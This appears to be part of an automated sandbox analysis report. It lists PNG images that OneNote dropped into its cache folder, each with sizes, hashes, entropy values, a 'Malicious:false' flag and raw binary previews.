                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
